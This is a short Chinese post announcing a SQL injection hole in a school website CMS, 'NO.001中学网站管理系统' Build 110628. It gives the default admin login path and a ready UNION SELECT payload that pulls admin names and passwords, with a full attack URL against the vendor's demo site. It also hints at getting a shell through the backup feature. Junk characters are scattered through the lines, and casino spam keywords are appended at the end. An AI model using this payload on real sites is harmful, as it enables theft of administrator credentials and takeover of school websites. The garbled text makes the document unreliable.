' k% p: b, w/ a7 P: P# F7 m7 K-----------------------------------------------------------------------------------------------------------------------------------------------------------------------
! p9 D% n' L; S2 t
. Q; z" E9 D* R" N& z* h" o2 k7 aNO.001中学网站管理系统 Build 110628 注入漏洞
3 r% y5 C/ E) b; Q' K& m
( _( u% G/ N  q# J# p+ y& _NO.001中学网站管理系统功能模块:
1.管理员资料:网站的基本信息设置（校长邮箱等）,数据库备份,用户管理、部门及权限管理等
2.学校简介:一级分类，可以添加校园简介,领导致辞、校园风光、联系我们。。。等信息
3 i2 ~1 g0 x0 j3.文章管理:二级分类,动态添加各相关频道（图片视频频道、学校概况频道除外）文章等信息
2 r0 j' A5 p$ N) l4.视频图片管理:一级分类,动态添加视频或者图片等信息
5.留言管理:对留言,修改,删除、回复等管理
6.校友频道:包括校友资料excel导出、管理等功能
7.友情链接管理:二级分类，能建立不同种类的友情链接显示在首页
( Z" X1 |- Q# ~+ y默认后台:admin/login.asp
官方演示:http://demo.001cms.net
) B7 U0 M3 J) n- W源码下载地址:http://down.chinaz.com/soft/30187.htm
& @% V' q! N+ `! T$ w) j2 N; KEXP:
3 P- i0 v- N- |4 iunion select 1,2,3,a_name,5,6,a_pass,8,9,10,11 from admin
测试:http://demo.001cms.net/shownews.asp?type=新闻动态&stype=校务公开&id=484 union select 1,2,3,a_name,5,6,a_pass,8,9,10,11 from admin
9 R0 d* L8 _: Y3 ggetshell:后台有备份，你懂的
6 e* ?# A. a- N  K  k5 x7 g另:FCK编辑器有几处可利用.大家自己行挖掘,由于相关内容较多，我在这里就不说了。
-------------------------------------------------------------------------------------------------------------------------------------------------------------------------

casino slots
online casino canada
new online casino
slot machines